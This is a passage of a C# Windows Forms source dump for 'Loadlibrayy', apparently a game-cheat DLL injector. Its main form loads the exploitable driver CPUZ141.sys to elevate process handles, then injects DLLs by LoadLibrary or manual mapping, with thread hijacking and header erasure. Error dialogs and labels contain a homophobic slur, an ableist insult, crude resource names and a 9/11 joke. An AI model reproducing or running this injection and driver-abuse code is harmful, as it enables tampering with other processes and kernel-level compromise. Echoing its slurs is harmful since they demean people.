System.ComponentModel.Container(); this.listImageListView = new System.Windows.Forms.ListView(); this.columnImagePaths = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.buttonAddImage = new System.Windows.Forms.Button(); this.buttonInitiateInjection = new System.Windows.Forms.Button(); this.contextDeleteImage = new System.Windows.Forms.ContextMenuStrip(this.components); this.deleteToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.deleteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.buttonClearImages = new System.Windows.Forms.Button(); this.groupBox1 = new System.Windows.Forms.GroupBox(); this.comboInjectionMethod = new System.Windows.Forms.ComboBox(); this.groupBox2 = new System.Windows.Forms.GroupBox(); this.comboExecutionMethod = new System.Windows.Forms.ComboBox(); this.groupBox3 = new System.Windows.Forms.GroupBox(); this.chkEraseHeaders = new System.Windows.Forms.CheckBox(); this.chkElevateHandle = new System.Windows.Forms.CheckBox(); this.buttonSelectProcess = new System.Windows.Forms.Button(); this.button1 = new System.Windows.Forms.Button(); this.label1 = new System.Windows.Forms.Label(); this.contextDeleteImage.SuspendLayout(); this.groupBox1.SuspendLayout(); this.groupBox2.SuspendLayout(); this.groupBox3.SuspendLayout(); this.SuspendLayout(); // // listImageListView // this.listImageListView.BackColor = System.Drawing.Color.White; this.listImageListView.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { this.columnImagePaths}); this.listImageListView.ForeColor = System.Drawing.SystemColors.InfoText; this.listImageListView.HeaderStyle = System.Windows.Forms.ColumnHeaderStyle.Nonclickable; this.listImageListView.Location = new System.Drawing.Point(16, 18); this.listImageListView.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.listImageListView.Name = "listImageListView"; this.listImageListView.Scrollable = false; this.listImageListView.Size = new System.Drawing.Size(364, 139); this.listImageListView.TabIndex = 0; this.listImageListView.UseCompatibleStateImageBehavior = false; this.listImageListView.View = System.Windows.Forms.View.Details; this.listImageListView.MouseDown += new System.Windows.Forms.MouseEventHandler(this.ListImageListView_MouseDown); // // columnImagePaths // this.columnImagePaths.Text = "Image Path"; this.columnImagePaths.Width = 641; // // buttonAddImage // this.buttonAddImage.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.buttonAddImage.FlatStyle = System.Windows.Forms.FlatStyle.Popup; this.buttonAddImage.ForeColor = System.Drawing.Color.White; this.buttonAddImage.Location = new System.Drawing.Point(396, 17); this.buttonAddImage.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.buttonAddImage.Name = "buttonAddImage"; this.buttonAddImage.Size = new System.Drawing.Size(65, 33); this.buttonAddImage.TabIndex = 1; this.buttonAddImage.Text = "Add"; this.buttonAddImage.UseVisualStyleBackColor = false; this.buttonAddImage.Click += new System.EventHandler(this.ButtonAddImage_Click); // // buttonInitiateInjection // this.buttonInitiateInjection.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.buttonInitiateInjection.FlatStyle = System.Windows.Forms.FlatStyle.Popup; this.buttonInitiateInjection.ForeColor = System.Drawing.Color.White; this.buttonInitiateInjection.Location = new System.Drawing.Point(240, 243); this.buttonInitiateInjection.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.buttonInitiateInjection.Name = "buttonInitiateInjection"; this.buttonInitiateInjection.Size = new System.Drawing.Size(88, 38); this.buttonInitiateInjection.TabIndex = 2; this.buttonInitiateInjection.Text = "x64 Inject"; this.buttonInitiateInjection.UseVisualStyleBackColor = false; this.buttonInitiateInjection.Click += new System.EventHandler(this.ButtonInitiateInjection_Click); // // contextDeleteImage // this.contextDeleteImage.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { this.deleteToolStripMenuItem1}); this.contextDeleteImage.Name = "contextImageOptions"; this.contextDeleteImage.Size = new System.Drawing.Size(108, 26); // // deleteToolStripMenuItem1 // this.deleteToolStripMenuItem1.Name = "deleteToolStripMenuItem1"; this.deleteToolStripMenuItem1.Size = new System.Drawing.Size(107, 22); this.deleteToolStripMenuItem1.Text = "Delete"; this.deleteToolStripMenuItem1.Click += new System.EventHandler(this.DeleteToolStripMenuItem1_Click); // // deleteToolStripMenuItem // this.deleteToolStripMenuItem.Name = "deleteToolStripMenuItem"; this.deleteToolStripMenuItem.Size = new System.Drawing.Size(152, 22); this.deleteToolStripMenuItem.Text = "Delete"; // // buttonClearImages // this.buttonClearImages.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.buttonClearImages.FlatStyle = System.Windows.Forms.FlatStyle.Popup; this.buttonClearImages.ForeColor = System.Drawing.Color.White; this.buttonClearImages.Location = new System.Drawing.Point(385, 60); this.buttonClearImages.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.buttonClearImages.Name = "buttonClearImages"; this.buttonClearImages.Size = new System.Drawing.Size(65, 33); this.buttonClearImages.TabIndex = 3; this.buttonClearImages.Text = "Clear"; this.buttonClearImages.UseVisualStyleBackColor = false; this.buttonClearImages.Click += new System.EventHandler(this.ButtonClearImages_Click); // // groupBox1 // this.groupBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.groupBox1.Controls.Add(this.comboInjectionMethod); this.groupBox1.ForeColor = System.Drawing.Color.White; this.groupBox1.Location = new System.Drawing.Point(17, 169); this.groupBox1.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.groupBox1.Name = "groupBox1"; this.groupBox1.Padding = new System.Windows.Forms.Padding(3, 5, 3, 5); this.groupBox1.Size = new System.Drawing.Size(215, 75); this.groupBox1.TabIndex = 4; this.groupBox1.TabStop = false; this.groupBox1.Text = "Injection Method"; // // comboInjectionMethod // this.comboInjectionMethod.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.comboInjectionMethod.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; this.comboInjectionMethod.FormattingEnabled = true; this.comboInjectionMethod.Items.AddRange(new object[] { "Load Library", "Manual Map"}); this.comboInjectionMethod.Location = new System.Drawing.Point(9, 33); this.comboInjectionMethod.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.comboInjectionMethod.Name = "comboInjectionMethod"; this.comboInjectionMethod.Size = new System.Drawing.Size(183, 27); this.comboInjectionMethod.TabIndex = 0; // // groupBox2 // this.groupBox2.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.groupBox2.Controls.Add(this.comboExecutionMethod); this.groupBox2.ForeColor = System.Drawing.Color.White; this.groupBox2.Location = new System.Drawing.Point(240, 169); this.groupBox2.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.groupBox2.Name = "groupBox2"; this.groupBox2.Padding = new System.Windows.Forms.Padding(3, 5, 3, 5); this.groupBox2.Size = new System.Drawing.Size(215, 64); this.groupBox2.TabIndex = 5; this.groupBox2.TabStop = false; this.groupBox2.Text = "Execution Method"; // // comboExecutionMethod // this.comboExecutionMethod.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.comboExecutionMethod.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; this.comboExecutionMethod.FormattingEnabled = true; this.comboExecutionMethod.Items.AddRange(new object[] { "Create Thread", "Hijack Thread"}); this.comboExecutionMethod.Location = new System.Drawing.Point(23, 20); this.comboExecutionMethod.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.comboExecutionMethod.Name = "comboExecutionMethod"; this.comboExecutionMethod.Size = new System.Drawing.Size(183, 27); this.comboExecutionMethod.TabIndex = 0; // // groupBox3 // this.groupBox3.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.groupBox3.Controls.Add(this.chkEraseHeaders); this.groupBox3.Controls.Add(this.chkElevateHandle); this.groupBox3.ForeColor = System.Drawing.Color.White; this.groupBox3.Location = new System.Drawing.Point(17, 252); this.groupBox3.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.groupBox3.Name = "groupBox3"; this.groupBox3.Padding = new System.Windows.Forms.Padding(3, 5, 3, 5); this.groupBox3.Size = new System.Drawing.Size(203, 93); this.groupBox3.TabIndex = 6; this.groupBox3.TabStop = false; this.groupBox3.Text = "Injection Options"; // // chkEraseHeaders // this.chkEraseHeaders.AutoSize = true; this.chkEraseHeaders.Location = new System.Drawing.Point(36, 50); this.chkEraseHeaders.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.chkEraseHeaders.Name = "chkEraseHeaders"; this.chkEraseHeaders.Size = new System.Drawing.Size(117, 23); this.chkEraseHeaders.TabIndex = 1; this.chkEraseHeaders.Text = "Erase headers"; this.chkEraseHeaders.UseVisualStyleBackColor = true; this.chkEraseHeaders.CheckedChanged += new System.EventHandler(this.ChkEraseHeaders_CheckedChanged); // // chkElevateHandle // this.chkElevateHandle.AutoSize = true; this.chkElevateHandle.Location = new System.Drawing.Point(36, 29); this.chkElevateHandle.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.chkElevateHandle.Name = "chkElevateHandle"; this.chkElevateHandle.Size = new System.Drawing.Size(120, 23); this.chkElevateHandle.TabIndex = 0; this.chkElevateHandle.Text = "Elevate handle"; this.chkElevateHandle.UseVisualStyleBackColor = true; this.chkElevateHandle.CheckedChanged += new System.EventHandler(this.ChkElevateHandle_CheckedChanged); // // buttonSelectProcess // this.buttonSelectProcess.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.buttonSelectProcess.FlatStyle = System.Windows.Forms.FlatStyle.Popup; this.buttonSelectProcess.ForeColor = System.Drawing.Color.White; this.buttonSelectProcess.Location = new System.Drawing.Point(367, 247); this.buttonSelectProcess.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.buttonSelectProcess.Name = "buttonSelectProcess"; this.buttonSelectProcess.Size = new System.Drawing.Size(88, 38); this.buttonSelectProcess.TabIndex = 7; this.buttonSelectProcess.Text = "Select"; this.buttonSelectProcess.UseVisualStyleBackColor = false; this.buttonSelectProcess.Click += new System.EventHandler(this.ButtonSelectProcess_Click); // // button1 // this.button1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(128)))), ((int)(((byte)(0))))); this.button1.Enabled = false; this.button1.FlatStyle = System.Windows.Forms.FlatStyle.Popup; this.button1.ForeColor = System.Drawing.Color.White; this.button1.Location = new System.Drawing.Point(385, 324); this.button1.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.button1.Name = "button1"; this.button1.Size = new System.Drawing.Size(88, 38); this.button1.TabIndex = 8; this.button1.Text = "x86 Inject"; this.button1.UseVisualStyleBackColor = false; // // label1 // this.label1.AutoSize = true; this.label1.Font = new System.Drawing.Font("Wingdings", 9.75F, ((System.Drawing.FontStyle)((((System.Drawing.FontStyle.Bold | System.Drawing.FontStyle.Italic) | System.Drawing.FontStyle.Underline) | System.Drawing.FontStyle.Strikeout))), System.Drawing.GraphicsUnit.Point, ((byte)(2))); this.label1.Location = new System.Drawing.Point(155, 1); this.label1.Name = "label1"; this.label1.Size = new System.Drawing.Size(180, 15); this.label1.TabIndex = 9; this.label1.Text = "wav did 9/11"; // // DankInjectionForm // this.AutoScaleDimensions = new System.Drawing.SizeF(8F, 19F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.BackgroundImage = global::Loadlibrayy.Properties.Resources.ayylmao; this.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch; this.ClientSize = new System.Drawing.Size(464, 355); this.Controls.Add(this.label1); this.Controls.Add(this.button1); this.Controls.Add(this.buttonSelectProcess); this.Controls.Add(this.groupBox3); this.Controls.Add(this.groupBox2); this.Controls.Add(this.groupBox1); this.Controls.Add(this.buttonClearImages); this.Controls.Add(this.buttonInitiateInjection); this.Controls.Add(this.buttonAddImage); this.Controls.Add(this.listImageListView); this.Font = new System.Drawing.Font("Comic Sans MS", 9.75F, ((System.Drawing.FontStyle)((((System.Drawing.FontStyle.Bold | System.Drawing.FontStyle.Italic) | System.Drawing.FontStyle.Underline) | System.Drawing.FontStyle.Strikeout))), System.Drawing.GraphicsUnit.Point, ((byte)(0))); this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.Fixed3D; this.Margin = new System.Windows.Forms.Padding(3, 5, 3, 5); this.MaximizeBox = false; this.Name = "DankInjectionForm"; this.RightToLeft = System.Windows.Forms.RightToLeft.No; this.ShowIcon = false; this.StartPosition = System.Windows.Forms.FormStartPosition.Manual; this.Text = "Loadlibrayy"; this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.InjectionForm_FormClosing); this.Load += new System.EventHandler(this.InjectionForm_Load); this.contextDeleteImage.ResumeLayout(false); this.groupBox1.ResumeLayout(false); this.groupBox2.ResumeLayout(false); this.groupBox3.ResumeLayout(false); this.groupBox3.PerformLayout(); this.ResumeLayout(false); this.PerformLayout(); } #endregion private System.Windows.Forms.ListView listImageListView; private System.Windows.Forms.ColumnHeader columnImagePaths; private System.Windows.Forms.Button buttonAddImage; private System.Windows.Forms.Button buttonInitiateInjection; private System.Windows.Forms.ContextMenuStrip contextDeleteImage; private System.Windows.Forms.ToolStripMenuItem deleteToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem deleteToolStripMenuItem1; private System.Windows.Forms.Button buttonClearImages; private System.Windows.Forms.GroupBox groupBox1; private System.Windows.Forms.ComboBox comboInjectionMethod; private System.Windows.Forms.GroupBox groupBox2; private System.Windows.Forms.ComboBox comboExecutionMethod; private System.Windows.Forms.GroupBox groupBox3; private System.Windows.Forms.CheckBox chkEraseHeaders; private System.Windows.Forms.CheckBox chkElevateHandle; private System.Windows.Forms.Button buttonSelectProcess; private System.Windows.Forms.Button button1; private System.Windows.Forms.Label label1; } } ================================================ FILE: Forms/DankInjectionForm.cs ================================================ using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using Loadlibrayy.Injection; using System.Diagnostics; using System.Media; using Loadlibrayy.Properties; using Loadlibrayy.Forms; using Loadlibrayy.Logger; using DriverExploits; namespace Loadlibrayy { public partial class DankInjectionForm : Form { public DankInjectionForm() { InitializeComponent(); } private SoundPlayer g_PhotonSoundPlayer; private void InjectionForm_Load(object sender, EventArgs e) { // [5:13 PM] aixxe: it should also appear slightly off screen when you open it this.SetDesktopLocation(-100, 0); g_PhotonSoundPlayer = new SoundPlayer(Resources.photonsound); // [12:33] wav: Your theme song needs work... new SoundPlayer(Resources.Hey_Everybody__Im_looking_at_gay_porno_).PlayLooping(); // DEFAULT VALUES comboInjectionMethod.SelectedIndex = 0; comboExecutionMethod.SelectedIndex = 0; Random rand = new Random(); var wingdingsFont = new Font("Wingdings", 15); var comicsansFont = new Font("Comic Sans MS", 15); Timer timer = new Timer(); timer.Tick += delegate { // FOR AYYFECT buttonAddImage.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); buttonClearImages.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); buttonInitiateInjection.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); buttonSelectProcess.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); chkElevateHandle.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); chkEraseHeaders.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); groupBox1.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); groupBox2.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); groupBox3.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); this.BackgroundImage = Environment.TickCount % 2 == 0 ? Resources.ayylmao : Resources.ayylmao2; this.label1.Font = Environment.TickCount % 2 == 0 ? wingdingsFont : comicsansFont; this.label1.ForeColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); this.label1.BackColor = Color.FromArgb(rand.Next(256), rand.Next(256), rand.Next(256)); this.Location = new Point(this.Location.X + rand.Next(10) - 4, this.Location.Y + rand.Next(10) - 4); buttonInitiateInjection.Location = new Point(buttonInitiateInjection.Location.X + rand.Next(3) - 1, buttonInitiateInjection.Location.Y + rand.Next(3) - 1); buttonClearImages.Location = new Point(buttonClearImages.Location.X + rand.Next(3) - 1, buttonClearImages.Location.Y + rand.Next(3) - 1); buttonAddImage.Location = new Point(buttonAddImage.Location.X + rand.Next(3) - 1, buttonAddImage.Location.Y + rand.Next(3) - 1); buttonSelectProcess.Location = new Point(buttonSelectProcess.Location.X + rand.Next(3) - 1, buttonSelectProcess.Location.Y + rand.Next(3) - 1); chkElevateHandle.Location = new Point(chkElevateHandle.Location.X + rand.Next(3) - 1, chkElevateHandle.Location.Y + rand.Next(3) - 1); chkEraseHeaders.Location = new Point(chkEraseHeaders.Location.X + rand.Next(3) - 1, chkEraseHeaders.Location.Y + rand.Next(3) - 1); comboExecutionMethod.Location = new Point(comboExecutionMethod.Location.X + rand.Next(3) - 1, comboExecutionMethod.Location.Y + rand.Next(3) - 1); comboInjectionMethod.Location = new Point(comboInjectionMethod.Location.X + rand.Next(3) - 1, comboInjectionMethod.Location.Y + rand.Next(3) - 1); }; timer.Start(); } private void InjectionForm_FormClosing(object sender, FormClosedEventArgs e) { Environment.Exit(0); } private Process g_SelectedProcess; private void ButtonInitiateInjection_Click(object sender, EventArgs e) { // SANITY CHECKS if (g_SelectedProcess == null) { Log.ShowError("Please select a process!", "Lol are you fucking retarded"); return; } if (listImageListView.Items.Count == 0) { Log.ShowError("Please select atleast one image to inject!", "Lol are you fucking retarded"); return; } // Theme Song ;) // SoundPlayer soundPlayer = new SoundPlayer(Resources.Le_Bretonniere); // soundPlayer.Play(); // LOAD EXPLOITABLE DRIVER bool driverLoaded = false; if (chkElevateHandle.Checked) { if (!(driverLoaded = ElevateHandle.Driver.Load())) { Log.ShowError("CPUZ141.sys failed to load", "lol fuck"); return; } ElevateHandle.UpdateDynamicData(); // UPDATE KERNEL OFFSETS ElevateHandle.Attach(); // ATTACH TO CURRENT PROCESS ElevateHandle.Elevate((ulong)g_SelectedProcess.Handle, 0x1fffff); } InjectionOptions options = new InjectionOptions() { ElevateHandle = chkElevateHandle.Checked, EraseHeaders = chkEraseHeaders.Checked, CreateLoaderReference = false }; ExecutionType executionType = 0; switch (comboExecutionMethod.SelectedIndex) { case 0: executionType = ExecutionType.CreateThread; break; case 1: executionType = ExecutionType.HijackThread; break; } IInjectionMethod injectionMethod = null; switch (comboInjectionMethod.SelectedIndex) { case 0: // LOAD LIBRARY injectionMethod = new LoadLibraryInjection(g_SelectedProcess, executionType, options); break; case 1: // MANUAL MAP injectionMethod = new ManualMapInjection(g_SelectedProcess, executionType, options); break; } foreach (ListViewItem item in listImageListView.Items) { if (injectionMethod.InjectImage(item.Text)) Log.ShowInformation($"Successfully injected {item.Text} -> {g_SelectedProcess.ProcessName}", "Success"); else Log.ShowError($"Failed injection {item.Text} -> {g_SelectedProcess.ProcessName}", "fuck"); } if (driverLoaded) ElevateHandle.Driver.Unload(); } private void ButtonAddImage_Click(object sender, EventArgs e) { g_PhotonSoundPlayer.Play(); OpenFileDialog fileDialog = new OpenFileDialog() { Filter = "Dynamic Link Libraries|*.dll", Multiselect = false }; if (fileDialog.ShowDialog() == DialogResult.OK) listImageListView.Items.Add(new ListViewItem(fileDialog.FileName)); } private void ButtonClearImages_Click(object sender, EventArgs e) { g_PhotonSoundPlayer.Play(); listImageListView.Items.Clear(); } private ListViewItem g_SelectedListViewItem; private void DeleteToolStripMenuItem1_Click(object sender, EventArgs e) { g_PhotonSoundPlayer.Play(); listImageListView.Items.Remove(g_SelectedListViewItem); g_SelectedListViewItem = null; } private void ListImageListView_MouseDown(object sender, MouseEventArgs e) { g_PhotonSoundPlayer.Play(); if (e.Button == MouseButtons.Right) { g_SelectedListViewItem = listImageListView.GetItemAt(e.X, e.Y); if (g_SelectedListViewItem == null) return; g_SelectedListViewItem.Selected = true; contextDeleteImage.Show(listImageListView, e.Location); } } private void ButtonSelectProcess_Click(object sender, EventArgs e) { g_PhotonSoundPlayer.Play(); TaskListForm taskListForm = new TaskListForm(); taskListForm.ShowDialog(); g_SelectedProcess = taskListForm.SelectedProcess; } private void ChkElevateHandle_CheckedChanged(object sender, EventArgs e) { g_PhotonSoundPlayer.Play(); if (chkElevateHandle.Checked) MessageBox.Show( "Kernel-land is dangerous for children, don't come crying if you blue screen (faggot)", "You are entering dangerous waters", MessageBoxButtons.OK, MessageBoxIcon.Warning); } private void ChkEraseHeaders_CheckedChanged(object sender, EventArgs e) { g_PhotonSoundPlayer.Play(); } private void InjectionForm_FormClosing(object sender, FormClosingEventArgs e) { //new SoundPlayer(Resources.windows_xp_shutdown).PlaySync(); Environment.Exit(0); } } } ================================================ FILE: Forms/DankInjectionForm.resx ================================================  text/microsoft-resx 2.0 System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 17, 17 ================================================ FILE: Forms/NewInjectionForm.Designer.cs ================================================ namespace Loadlibrayy.Forms { partial class NewInjectionForm { /// /// Required designer variable. /// private System.ComponentModel.IContainer components = null; /// /// Clean up any resources being used. /// /// true if managed resources should be disposed; otherwise, false. protected override void Dispose(bool disposing) { if (disposing && (components != null)) { components.Dispose(); } base.Dispose(disposing); } #region Windows Form Designer generated code /// /// Required method for Designer support - do not modify /// the contents of this method with the code editor. /// private void InitializeComponent() { this.InjectButton = new System.Windows.Forms.Button(); this.groupBox1 = new System.Windows.Forms.GroupBox(); this.LinkModuleCheckbox = new System.Windows.Forms.CheckBox(); this.ElevateHandleCheckbox = new System.Windows.Forms.CheckBox(); this.EraseHeadersCheckbox = new System.Windows.Forms.CheckBox(); this.groupBox2 = new System.Windows.Forms.GroupBox(); this.ModeCombo = new System.Windows.Forms.ComboBox(); this.SelectButton = new System.Windows.Forms.Button(); this.CreditLabel = new System.Windows.Forms.Label(); this.groupBox3 = new System.Windows.Forms.GroupBox(); this.TypeCombo = new System.Windows.Forms.ComboBox(); this.groupBox1.SuspendLayout(); this.groupBox2.SuspendLayout(); this.groupBox3.SuspendLayout(); this.SuspendLayout(); // // InjectButton // this.InjectButton.FlatAppearance.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(192)))), ((int)(((byte)(192))))); this.InjectButton.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.InjectButton.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.InjectButton.Location = new System.Drawing.Point(127, 110); this.InjectButton.Name = "InjectButton"; this.InjectButton.Size = new System.Drawing.Size(70, 23); this.InjectButton.TabIndex = 1; this.InjectButton.TabStop = false; this.InjectButton.Text = "Inject"; this.InjectButton.UseVisualStyleBackColor = true; this.InjectButton.Click += new System.EventHandler(this.InjectButton_Click); // // groupBox1 // this.groupBox1.Controls.Add(this.LinkModuleCheckbox); this.groupBox1.Controls.Add(this.ElevateHandleCheckbox); this.groupBox1.Controls.Add(this.EraseHeadersCheckbox); this.groupBox1.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.groupBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.groupBox1.Location = new System.Drawing.Point(127, 12); this.groupBox1.Name = "groupBox1"; this.groupBox1.Size = new System.Drawing.Size(128, 92); this.groupBox1.TabIndex = 2; this.groupBox1.TabStop = false; this.groupBox1.Text = "Options"; // // LinkModuleCheckbox // this.LinkModuleCheckbox.AutoSize = true; this.LinkModuleCheckbox.FlatAppearance.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(192)))), ((int)(((byte)(192))))); this.LinkModuleCheckbox.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.LinkModuleCheckbox.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.LinkModuleCheckbox.Location = new System.Drawing.Point(6, 65); this.LinkModuleCheckbox.Name = "LinkModuleCheckbox"; this.LinkModuleCheckbox.Size = new System.Drawing.Size(119, 17); this.LinkModuleCheckbox.TabIndex = 9; this.LinkModuleCheckbox.TabStop = false; this.LinkModuleCheckbox.Text = "Add loader entry"; this.LinkModuleCheckbox.UseVisualStyleBackColor = true; // // ElevateHandleCheckbox // this.ElevateHandleCheckbox.AutoSize = true; this.ElevateHandleCheckbox.FlatAppearance.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(192)))), ((int)(((byte)(192))))); this.ElevateHandleCheckbox.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.ElevateHandleCheckbox.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.ElevateHandleCheckbox.Location = new System.Drawing.Point(6, 42); this.ElevateHandleCheckbox.Name = "ElevateHandleCheckbox"; this.ElevateHandleCheckbox.Size = new System.Drawing.Size(107, 17); this.ElevateHandleCheckbox.TabIndex = 8; this.ElevateHandleCheckbox.TabStop = false; this.ElevateHandleCheckbox.Text = "Elevate Handle"; this.ElevateHandleCheckbox.UseVisualStyleBackColor = true; // // EraseHeadersCheckbox // this.EraseHeadersCheckbox.AutoSize = true; this.EraseHeadersCheckbox.FlatAppearance.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(192)))), ((int)(((byte)(192))))); this.EraseHeadersCheckbox.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.EraseHeadersCheckbox.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.EraseHeadersCheckbox.Location = new System.Drawing.Point(6, 19); this.EraseHeadersCheckbox.Name = "EraseHeadersCheckbox"; this.EraseHeadersCheckbox.Size = new System.Drawing.Size(101, 17); this.EraseHeadersCheckbox.TabIndex = 7; this.EraseHeadersCheckbox.TabStop = false; this.EraseHeadersCheckbox.Text = "Erase Headers"; this.EraseHeadersCheckbox.UseVisualStyleBackColor = true; // // groupBox2 // this.groupBox2.Controls.Add(this.ModeCombo); this.groupBox2.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.groupBox2.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.groupBox2.Location = new System.Drawing.Point(9, 12); this.groupBox2.Name = "groupBox2"; this.groupBox2.Size = new System.Drawing.Size(112, 43); this.groupBox2.TabIndex = 3; this.groupBox2.TabStop = false; this.groupBox2.Text = "Mode"; // // ModeCombo // this.ModeCombo.BackColor = System.Drawing.SystemColors.Control; this.ModeCombo.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; this.ModeCombo.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.ModeCombo.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.ModeCombo.FormattingEnabled = true; this.ModeCombo.Items.AddRange(new object[] { "Manualmap", "Loadlibrary"}); this.ModeCombo.Location = new System.Drawing.Point(4, 15); this.ModeCombo.Name = "ModeCombo"; this.ModeCombo.Size = new System.Drawing.Size(103, 21); this.ModeCombo.TabIndex = 0; this.ModeCombo.TabStop = false; // // SelectButton // this.SelectButton.FlatAppearance.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(192)))), ((int)(((byte)(192))))); this.SelectButton.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.SelectButton.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.SelectButton.Location = new System.Drawing.Point(51, 110); this.SelectButton.Name = "SelectButton"; this.SelectButton.Size = new System.Drawing.Size(70, 23); this.SelectButton.TabIndex = 5; this.SelectButton.TabStop = false; this.SelectButton.Text = "Select"; this.SelectButton.UseVisualStyleBackColor = true; this.SelectButton.Click += new System.EventHandler(this.SelectButton_Click); // // CreditLabel // this.CreditLabel.AutoSize = true; this.CreditLabel.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.CreditLabel.Font = new System.Drawing.Font("Consolas", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); this.CreditLabel.Location = new System.Drawing.Point(78, 136); this.CreditLabel.Name = "CreditLabel"; this.CreditLabel.Size = new System.Drawing.Size(97, 13); this.CreditLabel.TabIndex = 6; this.CreditLabel.Text = "By cheat.expert"; // // groupBox3 // this.groupBox3.Controls.Add(this.TypeCombo); this.groupBox3.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.groupBox3.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.groupBox3.Location = new System.Drawing.Point(9, 61); this.groupBox3.Name = "groupBox3"; this.groupBox3.Size = new 